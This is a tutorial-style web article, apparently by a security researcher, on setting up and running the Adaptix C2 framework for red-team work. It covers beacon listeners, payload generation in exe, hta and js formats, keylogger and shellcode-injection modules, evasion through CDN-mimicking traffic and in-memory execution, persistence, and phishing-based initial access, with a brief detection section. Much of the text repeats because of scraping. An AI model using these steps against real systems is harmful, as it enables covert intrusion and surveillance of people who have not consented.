Adaptix C2 Framework

What is a Command and Control (C2) Framework?

In offensive cybersecurity, a Command and Control (C2) framework is a critical component that enables post-exploitation communication between a compromised system and the attacker's infrastructure. It allows red team operators or adversaries to execute commands, exfiltrate data, deploy additional payloads, and maintain persistence on the target.

What is a Command and Control (C2) Framework?

Core Functions of a C2:

Session Management: Track and manage compromised endpoints (beacons)
Payload Deployment: Deliver binaries, scripts, or in-memory shellcode
Command Execution: Remotely run tasks on victim systems
Data Collection: Retrieve files, keystrokes, screenshots, etc.
Persistence & Lateral Movement: Maintain access and pivot across environments

Commonly used in red team assessments, C2 frameworks simulate real-world APTs and provide insight into an organization's detection and response capabilities.

Overview of the Framework

Language: Python 3.x
Interface: CLI and Web
Persistence: File-based SQLite backend
Transports: HTTP, HTTPS, DNS, SMB, and more
Implants: Supports PE, DLL, shellcode, staged and stageless payloads
Extensibility: Extenders API for adding capabilities like keyloggers, screenshots, process injection

Setup

# Clone the repository

$ git clone https://github.com/Adaptix-Framework/AdaptixC2

$ cd AdaptixC2

# Install dependencies

$ pip install -r requirements.txt

# Initialize and run

$ python3 adaptix.py --init

$ python3 adaptix.py

Creating and Managing Listeners

Starting a Beacon HTTP Listener

$ python3 adaptix.py --listener beacon-http --host 0.0.0.0 --port 443 --uri /connect

--listener: Selects the beacon listener type
--host: Bind address (use public IP or domain)
--port: Port to serve payloads and beacon comms
--uri: Path used to mask beacon check-ins

Available Listeners

beacon-http
beacon-http2
beacon-smb
beacon-dns

Adaptix C2 is a modern Command and Control framework designed for offensive security professionals. It offers a modular architecture, native evasion capabilities, and an extensible design that supports custom operational modules known as extenders. In this article, we’ll walk through its setup, configuration, usage in offensive operations, and real-world applications, focusing on red team scenarios and stealthy post-exploitation.

Installation

Requirements

Python 3.8+
pip, virtualenv (recommended)

Core Functions of a C2:

Session Management: Track and manage compromised endpoints (beacons)
Payload Deployment: Deliver binaries, scripts, or in-memory shellcode
Command Execution: Remotely run tasks on victim systems
Data Collection: Retrieve files, keystrokes, screenshots, etc.
Persistence & Lateral Movement: Maintain access and pivot across environments

Commonly used in red team assessments, C2 frameworks simulate real-world APTs and provide insight into an organization's detection and response capabilities.

Overview of the Framework

Language: Python 3.x
Interface: CLI and Web
Persistence: File-based SQLite backend
Transports: HTTP, HTTPS, DNS, SMB, and more
Implants: Supports PE, DLL, shellcode, staged and stageless payloads
Extensibility: Extenders API for adding capabilities like keyloggers, screenshots, process injection

Setup

# Clone the repository

$ git clone https://github.com/Adaptix-Framework/AdaptixC2

$ cd AdaptixC2

# Install dependencies

$ pip install -r requirements.txt

# Initialize and run

$ python3 adaptix.py --init

$ python3 adaptix.py

Creating and Managing Listeners

Starting a Beacon HTTP Listener

$ python3 adaptix.py --listener beacon-http --host 0.0.0.0 --port 443 --uri /connect

--listener: Selects the beacon listener type
--host: Bind address (use public IP or domain)
--port: Port to serve payloads and beacon comms
--uri: Path used to mask beacon check-ins

Available Listeners

beacon-http
beacon-http2
beacon-smb
beacon-dns

Payload Generation

Adaptix supports the generation of both staged and stageless payloads. Payloads can be obfuscated and embedded in delivery formats:

$ python3 adaptix.py --generate --format exe --listener beacon-http

Formats

exe
dll
shellcode
hta
js

Using Extenders

Installing the Extension Kit

$ git clone https://github.com/Adaptix-Framework/Extension-Kit

$ cd Extension-Kit

$ python3 install.py

Loading Extenders

> extender load screenshot

> extender load keylogger

> extender load inject

Common Mudules

screenshot: Captures user desktop
keylogger: Records keystrokes
inject: Injects shellcode into remote processes
filebrowser: Navigate remote filesystem

ARTICLES

What is a Command and Control (C2) Framework?

Adaptix C2 Framework

Milton Araújo

Security Researcher

Core Functions of a C2:

Session Management: Track and manage compromised endpoints (beacons)
Payload Deployment: Deliver binaries, scripts, or in-memory shellcode
Command Execution: Remotely run tasks on victim systems
Data Collection: Retrieve files, keystrokes, screenshots, etc.
Persistence & Lateral Movement: Maintain access and pivot across environments

Commonly used in red team assessments, C2 frameworks simulate real-world APTs and provide insight into an organization's detection and response capabilities.

Overview of the Framework

Language: Python 3.x
Interface: CLI and Web
Persistence: File-based SQLite backend
Transports: HTTP, HTTPS, DNS, SMB, and more
Implants: Supports PE, DLL, shellcode, staged and stageless payloads
Extensibility: Extenders API for adding capabilities like keyloggers, screenshots, process injection

Installation

Requirements

Python 3.8+
pip, virtualenv (recommended)

Setup

# Clone the repository

$ git clone https://github.com/Adaptix-Framework/AdaptixC2

$ cd AdaptixC2

# Install dependencies

$ pip install -r requirements.txt

# Initialize and run

$ python3 adaptix.py --init

$ python3 adaptix.py

Creating and Managing Listeners

Starting a Beacon HTTP Listener

$ python3 adaptix.py --listener beacon-http --host 0.0.0.0 --port 443 --uri /connect

--listener: Selects the beacon listener type
--host: Bind address (use public IP or domain)
--port: Port to serve payloads and beacon comms
--uri: Path used to mask beacon check-ins

Available Listeners

beacon-http
beacon-http2
beacon-smb
beacon-dns

Payload Generation

Adaptix supports the generation of both staged and stageless payloads. Payloads can be obfuscated and embedded in delivery formats:

$ python3 adaptix.py --generate --format exe --listener beacon-http

Formats

exe
dll
shellcode
hta
js

Using Extenders

Installing the Extension Kit

$ git clone https://github.com/Adaptix-Framework/Extension-Kit

$ cd Extension-Kit

$ python3 install.py

Loading Extenders

> extender load screenshot

> extender load keylogger

> extender load inject

Common Mudules

screenshot: Captures user desktop
keylogger: Records keystrokes
inject: Injects shellcode into remote processes
filebrowser: Navigate remote filesystem

Evasion Capabilities

Process Injection

Use the inject extender to target remote PIDs, mask process trees, and reduce visibility in memory scanners.

In-Memory Execution

Avoid writing to disk entirely by staging payloads via beacon commands and executing them in memory.

Traffic Shaping

Listeners support URL and header customization to emulate legitimate web services.

--uri /cdn/api/check --header "User-Agent: r19.io Chrome/118.0"

TLS Integration with Real Certificates

You can configure Adaptix C2 to serve over HTTPS with certificates issued by Cloudflare or Let's Encrypt:

$ openssl pkcs12 -in certificate.pfx -out fullchain.pem -nodes

$ python3 adaptix.py --listener beacon-http --cert fullchain.pem --key privkey

Operational Usage

Interactive Command Set

Command	Description
`ls`	List active beacons
`upload <file>`	Upload file to beacon
`download <file>`	Download file from beacon
`inject <pid>`	Inject shellcode into remote process
`extender load X`	Load extender module

Persistence Techniques

Registry Run keys
WMI permanent event consumers
Scheduled tasks with PowerShell payloads

Detection Considerations

Network

Monitor for unusual TLS certificates and domains
HTTP beacon URIs mimicking CDN or update services

Host

Monitor for process injection (memory scanners)
Registry and scheduled task modifications
Suspicious child-parent process hierarchies

Use Cases in Red Team Engagements

Initial access via phishing attachments (.hta, .js)
Payload delivery via SMB and DNS covert channels
Post-exploitation persistence with modular extenders
Privilege escalation via token stealing or UAC bypass

Final Thoughts

Adaptix C2 provides a highly customizable and modular platform for modern adversary simulation. It enables red teams to run stealthy, scalable, and flexible operations while maintaining a low detection profile. With support for extenders, real HTTPS traffic emulation, and modular listener architecture, it’s a solid framework for advanced offensive operations.

References

https://github.com/Adaptix-Framework/

Payload Generation

Adaptix supports the generation of both staged and stageless payloads. Payloads can be obfuscated and embedded in delivery formats:

$ python3 adaptix.py --generate --format exe --listener beacon-http

Formats

exe
dll
shellcode
hta
js

Using Extenders

Installing the Extension Kit

$ git clone https://github.com/Adaptix-Framework/Extension-Kit

$ cd Extension-Kit

$ python3 install.py

Loading Extenders

> extender load screenshot

> extender load keylogger

> extender load inject

Common Mudules

screenshot: Captures user desktop
keylogger: Records keystrokes
inject: Injects shellcode into remote processes
filebrowser: Navigate remote filesystem

Evasion Capabilities

Process Injection

Use the inject extender to target remote PIDs, mask process trees, and reduce visibility in memory scanners.

In-Memory Execution

Avoid writing to disk entirely by staging payloads via beacon commands and executing them in memory.

Traffic Shaping

Listeners support URL and header customization to emulate legitimate web services.

--uri /cdn/api/check --header "User-Agent: r19.io Chrome/118.0"

TLS Integration with Real Certificates

You can configure Adaptix C2 to serve over HTTPS with certificates issued by Cloudflare or Let's Encrypt:

$ openssl pkcs12 -in certificate.pfx -out fullchain.pem -nodes

$ python3 adaptix.py --listener beacon-http --cert fullchain.pem --key privkey

Operational Usage

Interactive Command Set

Command	Description
`ls`	List active beacons
`upload <file>`	Upload file to beacon
`download <file>`	Download file from beacon
`inject <pid>`	Inject shellcode into remote process
`extender load X`	Load extender module

Evasion Capabilities

Process Injection

Use the inject extender to target remote PIDs, mask process trees, and reduce visibility in memory scanners.

In-Memory Execution

Avoid writing to disk entirely by staging payloads via beacon commands and executing them in memory.

Traffic Shaping

Listeners support URL and header customization to emulate legitimate web services.

--uri /cdn/api/check --header "User-Agent: r19.io Chrome/118.0"

TLS Integration with Real Certificates

You can configure Adaptix C2 to serve over HTTPS with certificates issued by Cloudflare or Let's Encrypt:

$ openssl pkcs12 -in certificate.pfx -out fullchain.pem -nodes

$ python3 adaptix.py --listener beacon-http --cert fullchain.pem --key privkey

Operational Usage
Interactive Command Set

Command	Description
`ls`	List active beacons
`upload <file>`	Upload file to beacon
`download <file>`	Download file from beacon
`inject <pid>`	Inject shellcode into remote process
`extender load X`	Load extender module

Detection Considerations

Network

Monitor for unusual TLS certificates and domains
HTTP beacon URIs mimicking CDN or update services

Host

Monitor for process injection (memory scanners)
Registry and scheduled task modifications
Suspicious child-parent process hierarchies

Use Cases in Red Team Engagements

Initial access via phishing attachments (.hta, .js)
Payload delivery via SMB and DNS covert channels
Post-exploitation persistence with modular extenders
Privilege escalation via token stealing or UAC bypass

Final Thoughts

References

https://github.com/Adaptix-Framework/

Detection Considerations

Network

Monitor for unusual TLS certificates and domains
HTTP beacon URIs mimicking CDN or update services

Host

Monitor for process injection (memory scanners)
Registry and scheduled task modifications
Suspicious child-parent process hierarchies

Use Cases in Red Team Engagements

Initial access via phishing attachments (.hta, .js)
Payload delivery via SMB and DNS covert channels
Post-exploitation persistence with modular extenders
Privilege escalation via token stealing or UAC bypass

Final Thoughts

References

https://github.com/Adaptix-Framework/

Milton Araújo

Security Researcher

Milton Araújo

Security Researcher

Adaptix C2 Framework

What is a Command and Control (C2) Framework?

What is a Command and Control (C2) Framework?

Core Functions of a C2:

Overview of the Framework

Setup

Creating and Managing Listeners

Installation

Core Functions of a C2:

Overview of the Framework

Setup

Creating and Managing Listeners

Payload Generation

Using Extenders

ARTICLES

What is a Command and Control (C2) Framework?

Adaptix C2 Framework

Core Functions of a C2:

Overview of the Framework

Installation

Setup

Creating and Managing Listeners

Payload Generation

Using Extenders

Evasion Capabilities

TLS Integration with Real Certificates

Operational Usage

Payload Generation

Using Extenders

Evasion Capabilities

TLS Integration with Real Certificates

Operational Usage

Evasion Capabilities

TLS Integration with Real Certificates

Operational UsageInteractive Command Set

Operational Usage
Interactive Command Set